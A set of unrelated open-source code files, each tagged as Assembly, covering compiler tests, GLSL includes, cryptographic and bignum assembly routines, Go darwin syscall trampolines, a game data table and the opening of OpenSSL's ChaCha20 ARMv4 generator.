public func test_static_struct_let_tuple_wrapped_ints() -> Int {
return B.IT1.0.0 + B.IT2.1
}
// Test accessing multiple Int fields wrapped into multiple tuples, where each tuple may have
// multiple fields.
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B19_tuple_wrapped_intsSiyF
// CHECK: bb0:
// CHECK-NOT: global_addr
// CHECK: integer_literal
// CHECK: struct
// CHECK: return
@inline(never)
public func test_static_class_let_tuple_wrapped_ints() -> Int {
return C.IT1.0.0 + C.IT2.1
}
| {
"language": "Assembly"
} |
// -----------------------------------------------------------------------------
// Copyright (c) 2009-2016 Nicolas P. Rougier. All rights reserved.
// Distributed under the (new) BSD License.
// -----------------------------------------------------------------------------
#include "markers/arrow.glsl"
#include "markers/asterisk.glsl"
#include "markers/chevron.glsl"
#include "markers/clover.glsl"
#include "markers/club.glsl"
#include "markers/cross.glsl"
#include "markers/diamond.glsl"
#include "markers/disc.glsl"
#include "markers/ellipse.glsl"
#include "markers/hbar.glsl"
#include "markers/heart.glsl"
#include "markers/infinity.glsl"
#include "markers/pin.glsl"
#include "markers/ring.glsl"
#include "markers/spade.glsl"
#include "markers/square.glsl"
#include "markers/tag.glsl"
#include "markers/triangle.glsl"
#include "markers/vbar.glsl"
| {
"language": "Assembly"
} |
.data
.p2align 5
.text
.global PQCLEAN_NTRUHPS2048509_AVX2_poly_mod_q_Phi_n
.global _PQCLEAN_NTRUHPS2048509_AVX2_poly_mod_q_Phi_n
PQCLEAN_NTRUHPS2048509_AVX2_poly_mod_q_Phi_n:
_PQCLEAN_NTRUHPS2048509_AVX2_poly_mod_q_Phi_n:
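    # Broadcast coeffs[508] into every 16-bit lane, negate it, and add it
    # to every coefficient, i.e. the reduction mod Phi_n. Rough C model
    # (illustrative only):
    #   for (i = 0; i < 509; i++) r->coeffs[i] -= r->coeffs[508];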
vmovdqa 992(%rdi), %ymm0
vpermq $3, %ymm0, %ymm0
vpslld $16, %ymm0, %ymm0
vpsrld $16, %ymm0, %ymm1
vpor %ymm0, %ymm1, %ymm0
vbroadcastss %xmm0, %ymm0
vxorpd %ymm1, %ymm1, %ymm1
vpsubw %ymm0, %ymm1, %ymm0
vpaddw 0(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 0(%rdi)
vpaddw 32(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 32(%rdi)
vpaddw 64(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 64(%rdi)
vpaddw 96(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 96(%rdi)
vpaddw 128(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 128(%rdi)
vpaddw 160(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 160(%rdi)
vpaddw 192(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 192(%rdi)
vpaddw 224(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 224(%rdi)
vpaddw 256(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 256(%rdi)
vpaddw 288(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 288(%rdi)
vpaddw 320(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 320(%rdi)
vpaddw 352(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 352(%rdi)
vpaddw 384(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 384(%rdi)
vpaddw 416(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 416(%rdi)
vpaddw 448(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 448(%rdi)
vpaddw 480(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 480(%rdi)
vpaddw 512(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 512(%rdi)
vpaddw 544(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 544(%rdi)
vpaddw 576(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 576(%rdi)
vpaddw 608(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 608(%rdi)
vpaddw 640(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 640(%rdi)
vpaddw 672(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 672(%rdi)
vpaddw 704(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 704(%rdi)
vpaddw 736(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 736(%rdi)
vpaddw 768(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 768(%rdi)
vpaddw 800(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 800(%rdi)
vpaddw 832(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 832(%rdi)
vpaddw 864(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 864(%rdi)
vpaddw 896(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 896(%rdi)
vpaddw 928(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 928(%rdi)
vpaddw 960(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 960(%rdi)
vpaddw 992(%rdi), %ymm0, %ymm1
vmovdqa %ymm1, 992(%rdi)
ret
| {
"language": "Assembly"
} |
; RUN: llc -march=mipsel < %s | FileCheck %s
; RUN: llc -march=mips64el < %s | FileCheck %s
; CHECK-LABEL: test_blez:
; CHECK: blez ${{[0-9]+}}, $BB
define void @test_blez(i32 %a) {
entry:
%cmp = icmp sgt i32 %a, 0
br i1 %cmp, label %if.then, label %if.end
if.then:
tail call void @foo1()
br label %if.end
if.end:
ret void
}
declare void @foo1()
; CHECK-LABEL: test_bgez:
; CHECK: bgez ${{[0-9]+}}, $BB
define void @test_bgez(i32 %a) {
entry:
%cmp = icmp slt i32 %a, 0
br i1 %cmp, label %if.then, label %if.end
if.then:
tail call void @foo1()
br label %if.end
if.end:
ret void
}
| {
"language": "Assembly"
} |
// go run mkasm_darwin.go amd64
// Code generated by the command above; DO NOT EDIT.
// +build go1.12
#include "textflag.h"
TEXT ·libc_getgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgroups(SB)
TEXT ·libc_setgroups_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgroups(SB)
TEXT ·libc_wait4_trampoline(SB),NOSPLIT,$0-0
JMP libc_wait4(SB)
TEXT ·libc_accept_trampoline(SB),NOSPLIT,$0-0
JMP libc_accept(SB)
TEXT ·libc_bind_trampoline(SB),NOSPLIT,$0-0
JMP libc_bind(SB)
TEXT ·libc_connect_trampoline(SB),NOSPLIT,$0-0
JMP libc_connect(SB)
TEXT ·libc_socket_trampoline(SB),NOSPLIT,$0-0
JMP libc_socket(SB)
TEXT ·libc_getsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockopt(SB)
TEXT ·libc_setsockopt_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsockopt(SB)
TEXT ·libc_getpeername_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpeername(SB)
TEXT ·libc_getsockname_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsockname(SB)
TEXT ·libc_shutdown_trampoline(SB),NOSPLIT,$0-0
JMP libc_shutdown(SB)
TEXT ·libc_socketpair_trampoline(SB),NOSPLIT,$0-0
JMP libc_socketpair(SB)
TEXT ·libc_recvfrom_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvfrom(SB)
TEXT ·libc_sendto_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendto(SB)
TEXT ·libc_recvmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_recvmsg(SB)
TEXT ·libc_sendmsg_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendmsg(SB)
TEXT ·libc_kevent_trampoline(SB),NOSPLIT,$0-0
JMP libc_kevent(SB)
TEXT ·libc___sysctl_trampoline(SB),NOSPLIT,$0-0
JMP libc___sysctl(SB)
TEXT ·libc_utimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_utimes(SB)
TEXT ·libc_futimes_trampoline(SB),NOSPLIT,$0-0
JMP libc_futimes(SB)
TEXT ·libc_fcntl_trampoline(SB),NOSPLIT,$0-0
JMP libc_fcntl(SB)
TEXT ·libc_poll_trampoline(SB),NOSPLIT,$0-0
JMP libc_poll(SB)
TEXT ·libc_madvise_trampoline(SB),NOSPLIT,$0-0
JMP libc_madvise(SB)
TEXT ·libc_mlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlock(SB)
TEXT ·libc_mlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_mlockall(SB)
TEXT ·libc_mprotect_trampoline(SB),NOSPLIT,$0-0
JMP libc_mprotect(SB)
TEXT ·libc_msync_trampoline(SB),NOSPLIT,$0-0
JMP libc_msync(SB)
TEXT ·libc_munlock_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlock(SB)
TEXT ·libc_munlockall_trampoline(SB),NOSPLIT,$0-0
JMP libc_munlockall(SB)
TEXT ·libc_getattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_getattrlist(SB)
TEXT ·libc_pipe_trampoline(SB),NOSPLIT,$0-0
JMP libc_pipe(SB)
TEXT ·libc_getxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_getxattr(SB)
TEXT ·libc_fgetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fgetxattr(SB)
TEXT ·libc_setxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_setxattr(SB)
TEXT ·libc_fsetxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsetxattr(SB)
TEXT ·libc_removexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_removexattr(SB)
TEXT ·libc_fremovexattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_fremovexattr(SB)
TEXT ·libc_listxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_listxattr(SB)
TEXT ·libc_flistxattr_trampoline(SB),NOSPLIT,$0-0
JMP libc_flistxattr(SB)
TEXT ·libc_setattrlist_trampoline(SB),NOSPLIT,$0-0
JMP libc_setattrlist(SB)
TEXT ·libc_kill_trampoline(SB),NOSPLIT,$0-0
JMP libc_kill(SB)
TEXT ·libc_ioctl_trampoline(SB),NOSPLIT,$0-0
JMP libc_ioctl(SB)
TEXT ·libc_sendfile_trampoline(SB),NOSPLIT,$0-0
JMP libc_sendfile(SB)
TEXT ·libc_access_trampoline(SB),NOSPLIT,$0-0
JMP libc_access(SB)
TEXT ·libc_adjtime_trampoline(SB),NOSPLIT,$0-0
JMP libc_adjtime(SB)
TEXT ·libc_chdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_chdir(SB)
TEXT ·libc_chflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_chflags(SB)
TEXT ·libc_chmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_chmod(SB)
TEXT ·libc_chown_trampoline(SB),NOSPLIT,$0-0
JMP libc_chown(SB)
TEXT ·libc_chroot_trampoline(SB),NOSPLIT,$0-0
JMP libc_chroot(SB)
TEXT ·libc_clock_gettime_trampoline(SB),NOSPLIT,$0-0
JMP libc_clock_gettime(SB)
TEXT ·libc_close_trampoline(SB),NOSPLIT,$0-0
JMP libc_close(SB)
TEXT ·libc_dup_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup(SB)
TEXT ·libc_dup2_trampoline(SB),NOSPLIT,$0-0
JMP libc_dup2(SB)
TEXT ·libc_exchangedata_trampoline(SB),NOSPLIT,$0-0
JMP libc_exchangedata(SB)
TEXT ·libc_exit_trampoline(SB),NOSPLIT,$0-0
JMP libc_exit(SB)
TEXT ·libc_faccessat_trampoline(SB),NOSPLIT,$0-0
JMP libc_faccessat(SB)
TEXT ·libc_fchdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchdir(SB)
TEXT ·libc_fchflags_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchflags(SB)
TEXT ·libc_fchmod_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmod(SB)
TEXT ·libc_fchmodat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchmodat(SB)
TEXT ·libc_fchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchown(SB)
TEXT ·libc_fchownat_trampoline(SB),NOSPLIT,$0-0
JMP libc_fchownat(SB)
TEXT ·libc_flock_trampoline(SB),NOSPLIT,$0-0
JMP libc_flock(SB)
TEXT ·libc_fpathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_fpathconf(SB)
TEXT ·libc_fsync_trampoline(SB),NOSPLIT,$0-0
JMP libc_fsync(SB)
TEXT ·libc_ftruncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_ftruncate(SB)
TEXT ·libc_getdtablesize_trampoline(SB),NOSPLIT,$0-0
JMP libc_getdtablesize(SB)
TEXT ·libc_getegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getegid(SB)
TEXT ·libc_geteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_geteuid(SB)
TEXT ·libc_getgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getgid(SB)
TEXT ·libc_getpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgid(SB)
TEXT ·libc_getpgrp_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpgrp(SB)
TEXT ·libc_getpid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpid(SB)
TEXT ·libc_getppid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getppid(SB)
TEXT ·libc_getpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_getpriority(SB)
TEXT ·libc_getrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrlimit(SB)
TEXT ·libc_getrusage_trampoline(SB),NOSPLIT,$0-0
JMP libc_getrusage(SB)
TEXT ·libc_getsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getsid(SB)
TEXT ·libc_getuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_getuid(SB)
TEXT ·libc_issetugid_trampoline(SB),NOSPLIT,$0-0
JMP libc_issetugid(SB)
TEXT ·libc_kqueue_trampoline(SB),NOSPLIT,$0-0
JMP libc_kqueue(SB)
TEXT ·libc_lchown_trampoline(SB),NOSPLIT,$0-0
JMP libc_lchown(SB)
TEXT ·libc_link_trampoline(SB),NOSPLIT,$0-0
JMP libc_link(SB)
TEXT ·libc_linkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_linkat(SB)
TEXT ·libc_listen_trampoline(SB),NOSPLIT,$0-0
JMP libc_listen(SB)
TEXT ·libc_mkdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdir(SB)
TEXT ·libc_mkdirat_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkdirat(SB)
TEXT ·libc_mkfifo_trampoline(SB),NOSPLIT,$0-0
JMP libc_mkfifo(SB)
TEXT ·libc_mknod_trampoline(SB),NOSPLIT,$0-0
JMP libc_mknod(SB)
TEXT ·libc_open_trampoline(SB),NOSPLIT,$0-0
JMP libc_open(SB)
TEXT ·libc_openat_trampoline(SB),NOSPLIT,$0-0
JMP libc_openat(SB)
TEXT ·libc_pathconf_trampoline(SB),NOSPLIT,$0-0
JMP libc_pathconf(SB)
TEXT ·libc_pread_trampoline(SB),NOSPLIT,$0-0
JMP libc_pread(SB)
TEXT ·libc_pwrite_trampoline(SB),NOSPLIT,$0-0
JMP libc_pwrite(SB)
TEXT ·libc_read_trampoline(SB),NOSPLIT,$0-0
JMP libc_read(SB)
TEXT ·libc_readlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlink(SB)
TEXT ·libc_readlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_readlinkat(SB)
TEXT ·libc_rename_trampoline(SB),NOSPLIT,$0-0
JMP libc_rename(SB)
TEXT ·libc_renameat_trampoline(SB),NOSPLIT,$0-0
JMP libc_renameat(SB)
TEXT ·libc_revoke_trampoline(SB),NOSPLIT,$0-0
JMP libc_revoke(SB)
TEXT ·libc_rmdir_trampoline(SB),NOSPLIT,$0-0
JMP libc_rmdir(SB)
TEXT ·libc_lseek_trampoline(SB),NOSPLIT,$0-0
JMP libc_lseek(SB)
TEXT ·libc_select_trampoline(SB),NOSPLIT,$0-0
JMP libc_select(SB)
TEXT ·libc_setegid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setegid(SB)
TEXT ·libc_seteuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_seteuid(SB)
TEXT ·libc_setgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setgid(SB)
TEXT ·libc_setlogin_trampoline(SB),NOSPLIT,$0-0
JMP libc_setlogin(SB)
TEXT ·libc_setpgid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpgid(SB)
TEXT ·libc_setpriority_trampoline(SB),NOSPLIT,$0-0
JMP libc_setpriority(SB)
TEXT ·libc_setprivexec_trampoline(SB),NOSPLIT,$0-0
JMP libc_setprivexec(SB)
TEXT ·libc_setregid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setregid(SB)
TEXT ·libc_setreuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setreuid(SB)
TEXT ·libc_setrlimit_trampoline(SB),NOSPLIT,$0-0
JMP libc_setrlimit(SB)
TEXT ·libc_setsid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setsid(SB)
TEXT ·libc_settimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_settimeofday(SB)
TEXT ·libc_setuid_trampoline(SB),NOSPLIT,$0-0
JMP libc_setuid(SB)
TEXT ·libc_symlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlink(SB)
TEXT ·libc_symlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_symlinkat(SB)
TEXT ·libc_sync_trampoline(SB),NOSPLIT,$0-0
JMP libc_sync(SB)
TEXT ·libc_truncate_trampoline(SB),NOSPLIT,$0-0
JMP libc_truncate(SB)
TEXT ·libc_umask_trampoline(SB),NOSPLIT,$0-0
JMP libc_umask(SB)
TEXT ·libc_undelete_trampoline(SB),NOSPLIT,$0-0
JMP libc_undelete(SB)
TEXT ·libc_unlink_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlink(SB)
TEXT ·libc_unlinkat_trampoline(SB),NOSPLIT,$0-0
JMP libc_unlinkat(SB)
TEXT ·libc_unmount_trampoline(SB),NOSPLIT,$0-0
JMP libc_unmount(SB)
TEXT ·libc_write_trampoline(SB),NOSPLIT,$0-0
JMP libc_write(SB)
TEXT ·libc_mmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_mmap(SB)
TEXT ·libc_munmap_trampoline(SB),NOSPLIT,$0-0
JMP libc_munmap(SB)
TEXT ·libc_ptrace_trampoline(SB),NOSPLIT,$0-0
JMP libc_ptrace(SB)
TEXT ·libc_gettimeofday_trampoline(SB),NOSPLIT,$0-0
JMP libc_gettimeofday(SB)
TEXT ·libc_fstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstat64(SB)
TEXT ·libc_fstatat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatat64(SB)
TEXT ·libc_fstatfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_fstatfs64(SB)
TEXT ·libc___getdirentries64_trampoline(SB),NOSPLIT,$0-0
JMP libc___getdirentries64(SB)
TEXT ·libc_getfsstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_getfsstat64(SB)
TEXT ·libc_lstat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_lstat64(SB)
TEXT ·libc_stat64_trampoline(SB),NOSPLIT,$0-0
JMP libc_stat64(SB)
TEXT ·libc_statfs64_trampoline(SB),NOSPLIT,$0-0
JMP libc_statfs64(SB)
| {
"language": "Assembly"
} |
dnl AMD K6-2 mpn_com -- mpn bitwise one's complement.
dnl Copyright 1999-2002 Free Software Foundation, Inc.
dnl This file is part of the GNU MP Library.
dnl
dnl The GNU MP Library is free software; you can redistribute it and/or modify
dnl it under the terms of either:
dnl
dnl * the GNU Lesser General Public License as published by the Free
dnl Software Foundation; either version 3 of the License, or (at your
dnl option) any later version.
dnl
dnl or
dnl
dnl * the GNU General Public License as published by the Free Software
dnl Foundation; either version 2 of the License, or (at your option) any
dnl later version.
dnl
dnl or both in parallel, as here.
dnl
dnl The GNU MP Library is distributed in the hope that it will be useful, but
dnl WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
dnl or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
dnl for more details.
dnl
dnl You should have received copies of the GNU General Public License and the
dnl GNU Lesser General Public License along with the GNU MP Library. If not,
dnl see https://www.gnu.org/licenses/.
include(`../config.m4')
NAILS_SUPPORT(0-31)
C alignment dst/src, A=0mod8 N=4mod8
C A/A A/N N/A N/N
C K6-2 1.0 1.18 1.18 1.18 cycles/limb
C K6 1.5 1.85 1.75 1.85
C void mpn_com (mp_ptr dst, mp_srcptr src, mp_size_t size);
C
C Take the bitwise ones-complement of src,size and write it to dst,size.
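C
C Reference behaviour (illustrative C only):
C
C	for (i = 0; i < size; i++)
C	    dst[i] = (~src[i]) & GMP_NUMB_MASK;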
defframe(PARAM_SIZE,12)
defframe(PARAM_SRC, 8)
defframe(PARAM_DST, 4)
TEXT
ALIGN(16)
PROLOGUE(mpn_com)
deflit(`FRAME',0)
movl PARAM_SIZE, %ecx
movl PARAM_SRC, %eax
movl PARAM_DST, %edx
shrl %ecx
jnz L(two_or_more)
movl (%eax), %eax
notl_or_xorl_GMP_NUMB_MASK( %eax)
movl %eax, (%edx)
ret
L(two_or_more):
pushl %ebx FRAME_pushl()
pcmpeqd %mm7, %mm7 C all ones
movl %ecx, %ebx
ifelse(GMP_NAIL_BITS,0,,
` psrld $GMP_NAIL_BITS, %mm7') C clear nails
ALIGN(8)
L(top):
C eax src
C ebx floor(size/2)
C ecx counter
C edx dst
C
C mm0 scratch
C mm7 mask
movq -8(%eax,%ecx,8), %mm0
pxor %mm7, %mm0
movq %mm0, -8(%edx,%ecx,8)
loop L(top)
jnc L(no_extra)
movl (%eax,%ebx,8), %eax
notl_or_xorl_GMP_NUMB_MASK( %eax)
movl %eax, (%edx,%ebx,8)
L(no_extra):
popl %ebx
emms_or_femms
ret
EPILOGUE()
| {
"language": "Assembly"
} |
db DEX_PUPURIN ; 174
db 50, 50, 50, 50, 50, 50
; hp atk def spd sat sdf
db TYPE_NORMAL, TYPE_NORMAL ; type
db 255 ; catch rate
db 100 ; base exp
db ITEM_BERRY, ITEM_STRANGE_POWER ; items
db GENDER_50_50 ; gender ratio
db 100, 4, 70 ; unknown
dn 5, 5 ; sprite dimensions
dw PupurinPicFront, PupurinPicBack ; sprites
db GROWTH_MEDIUM_SLOW ; growth rate
; tm/hm learnset
tmhm 1, 5, 6, 8, 9, 10, 11, 12, 13, 14, 15, 17, 18, 19, 20, 22, 24, 25, 29, 30, 31, 32, 33, 34, 35, 36, 38, 40, 44, 45, 46, 49, 50, 54, 55
; end
| {
"language": "Assembly"
} |
#! /usr/bin/env perl
# Copyright 2016 The OpenSSL Project Authors. All Rights Reserved.
#
# Licensed under the OpenSSL license (the "License"). You may not use
# this file except in compliance with the License. You can obtain a copy
# in the file LICENSE in the source distribution or at
# https://www.openssl.org/source/license.html
#
# ====================================================================
# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
# project. The module is, however, dual licensed under OpenSSL and
# CRYPTOGAMS licenses depending on where you obtain it. For further
# details see http://www.openssl.org/~appro/cryptogams/.
# ====================================================================
#
# December 2014
#
# ChaCha20 for ARMv4.
#
# Performance in cycles per byte out of large buffer.
#
#                  IALU/gcc-4.4     1xNEON    3xNEON+1xIALU
#
# Cortex-A5        19.3(*)/+95%     21.8      14.1
# Cortex-A8        10.5(*)/+160%    13.9      6.35
# Cortex-A9        12.9(**)/+110%   14.3      6.50
# Cortex-A15       11.0/+40%        16.0      5.00
# Snapdragon S4    11.5/+125%       13.6      4.90
#
# (*) most "favourable" result for aligned data on little-endian
# processor, result for misaligned data is 10-15% lower;
# (**) this result is a trade-off: it can be improved by 20%,
# but then Snapdragon S4 and Cortex-A8 results get
# 20-25% worse;
$flavour = shift;
if ($flavour=~/\w[\w\-]*\.\w+$/) { $output=$flavour; undef $flavour; }
else { while (($output=shift) && ($output!~/\w[\w\-]*\.\w+$/)) {} }
if ($flavour && $flavour ne "void") {
$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
( $xlate="${dir}../arm-xlate.pl" and -f $xlate ) or
( $xlate="${dir}../tools/arm-xlate.pl" and -f $xlate) or
die "can't locate arm-xlate.pl";
open STDOUT,"| \"$^X\" $xlate $flavour $output";
} else {
open STDOUT,">$output";
}
sub AUTOLOAD() # thunk [simplified] x86-style perlasm
{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://; $opcode =~ s/_/\./;
my $arg = pop;
$arg = "#$arg" if ($arg*1 eq $arg);
$code .= "\t$opcode\t".join(',',@_,$arg)."\n";
}
my @x=map("r$_",(0..7,"x","x","x","x",12,"x",14,"x"));
my @t=map("r$_",(8..11));
sub ROUND {
my ($a0,$b0,$c0,$d0)=@_;
my ($a1,$b1,$c1,$d1)=map(($_&~3)+(($_+1)&3),($a0,$b0,$c0,$d0));
my ($a2,$b2,$c2,$d2)=map(($_&~3)+(($_+1)&3),($a1,$b1,$c1,$d1));
my ($a3,$b3,$c3,$d3)=map(($_&~3)+(($_+1)&3),($a2,$b2,$c2,$d2));
my $odd = $d0&1;
my ($xc,$xc_) = (@t[0..1]);
my ($xd,$xd_) = $odd ? (@t[2],@x[$d1]) : (@x[$d0],@t[2]);
my @ret;
# Consider order in which variables are addressed by their
# index:
#
# a b c d
#
# 0 4 8 12 < even round
# 1 5 9 13
# 2 6 10 14
# 3 7 11 15
# 0 5 10 15 < odd round
# 1 6 11 12
# 2 7 8 13
# 3 4 9 14
#
# 'a', 'b' are permanently allocated in registers, @x[0..7],
# while 'c's and pair of 'd's are maintained in memory. If
# you observe 'c' column, you'll notice that pair of 'c's is
# invariant between rounds. This means that we have to reload
# them once per round, in the middle. This is why you'll see
# bunch of 'c' stores and loads in the middle, but none in
# the beginning or end. If you observe 'd' column, you'll
# notice that 15 and 13 are reused in next pair of rounds.
# This is why these two are chosen for offloading to memory,
# to make loads count more.
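#
# For reference, the scalar model being interleaved below is the
# standard ChaCha quarter-round (a sketch; the ror#16/20/24/25 forms
# used in the code are the right-rotate equivalents of the spec's
# rotl 16/12/8/7):
#
#	a += b; d ^= a; d = rotl32(d, 16);
#	c += d; b ^= c; b = rotl32(b, 12);
#	a += b; d ^= a; d = rotl32(d,  8);
#	c += d; b ^= c; b = rotl32(b,  7);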
push @ret,(
"&add (@x[$a0],@x[$a0],@x[$b0])",
"&mov ($xd,$xd,'ror#16')",
"&add (@x[$a1],@x[$a1],@x[$b1])",
"&mov ($xd_,$xd_,'ror#16')",
"&eor ($xd,$xd,@x[$a0],'ror#16')",
"&eor ($xd_,$xd_,@x[$a1],'ror#16')",
"&add ($xc,$xc,$xd)",
"&mov (@x[$b0],@x[$b0],'ror#20')",
"&add ($xc_,$xc_,$xd_)",
"&mov (@x[$b1],@x[$b1],'ror#20')",
"&eor (@x[$b0],@x[$b0],$xc,'ror#20')",
"&eor (@x[$b1],@x[$b1],$xc_,'ror#20')",
"&add (@x[$a0],@x[$a0],@x[$b0])",
"&mov ($xd,$xd,'ror#24')",
"&add (@x[$a1],@x[$a1],@x[$b1])",
"&mov ($xd_,$xd_,'ror#24')",
"&eor ($xd,$xd,@x[$a0],'ror#24')",
"&eor ($xd_,$xd_,@x[$a1],'ror#24')",
"&add ($xc,$xc,$xd)",
"&mov (@x[$b0],@x[$b0],'ror#25')" );
push @ret,(
"&str ($xd,'[sp,#4*(16+$d0)]')",
"&ldr ($xd,'[sp,#4*(16+$d2)]')" ) if ($odd);
push @ret,(
"&add ($xc_,$xc_,$xd_)",
"&mov (@x[$b1],@x[$b1],'ror#25')" );
push @ret,(
"&str ($xd_,'[sp,#4*(16+$d1)]')",
"&ldr ($xd_,'[sp,#4*(16+$d3)]')" ) if (!$odd);
push @ret,(
"&eor (@x[$b0],@x[$b0],$xc,'ror#25')",
"&eor (@x[$b1],@x[$b1],$xc_,'ror#25')" );
$xd=@x[$d2] if (!$odd);
$xd_=@x[$d3] if ($odd);
push @ret,(
"&str ($xc,'[sp,#4*(16+$c0)]')",
"&ldr ($xc,'[sp,#4*(16+$c2)]')",
"&add (@x[$a2],@x[$a2],@x[$b2])",
"&mov ($xd,$xd,'ror#16')",
"&str ($xc_,'[sp,#4*(16+$c1)]')",
"&ldr ($xc_,'[sp,#4*(16+$c3)]')",
"&add (@x[$a3],@x[$a3],@x[$b3])",
"&mov ($xd_,$xd_,'ror#16')",
"&eor ($xd,$xd,@x[$a2],'ror#16')",
"&eor ($xd_,$xd_,@x[$a3],'ror#16')",
"&add ($xc,$xc,$xd)",
"&mov (@x[$b2],@x[$b2],'ror#20')",
"&add ($xc_,$xc_,$xd_)",
"&mov (@x[$b3],@x[$b3],'ror#20')",
"&eor (@x[$b2],@x[$b2],$xc,'ror#20')",
"&eor (@x[$b3],@x[$b3],$xc_,'ror#20')",
"&add (@x[$a2],@x[$a2],@x[$b2])",
"&mov ($xd,$xd,'ror#24')",
"&add (@x[$a3],@x[$a3],@x[$b3])",
"&mov ($xd_,$xd_,'ror#24')",
"&eor ($xd,$xd,@x[$a2],'ror#24')",
"&eor ($xd_,$xd_,@x[$a3],'ror#24')",
"&add ($xc,$xc,$xd)",
"&mov (@x[$b2],@x[$b2],'ror#25')",
"&add ($xc_,$xc_,$xd_)",
"&mov (@x[$b3],@x[$b3],'ror#25')",
"&eor (@x[$b2],@x[$b2],$xc,'ror#25')",
"&eor (@x[$b3],@x[$b3],$xc_,'ror#25')" );
@ret;
}
$code.=<<___;
#include "arm_arch.h"
.text
